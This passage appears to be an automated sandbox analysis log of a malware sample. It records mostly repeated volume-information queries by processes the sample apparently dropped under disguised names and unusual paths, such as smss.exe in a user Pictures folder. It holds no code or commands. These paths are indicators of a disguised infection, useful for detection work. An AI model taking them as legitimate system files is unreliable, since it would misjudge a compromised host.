Source: C:\Users\user\Desktop\4t8f8F3uT1.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_006AAF0F

Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Queries volume information: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe VolumeInformation	Jump to behavior
Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Queries volume information: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	Queries volume information: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe VolumeInformation
Source: C:\Users\Default\Pictures\smss.exe	Queries volume information: C:\Users\Default\Pictures\smss.exe VolumeInformation
Source: C:\Users\Default\Pictures\smss.exe	Queries volume information: C:\Users\Default\Pictures\smss.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
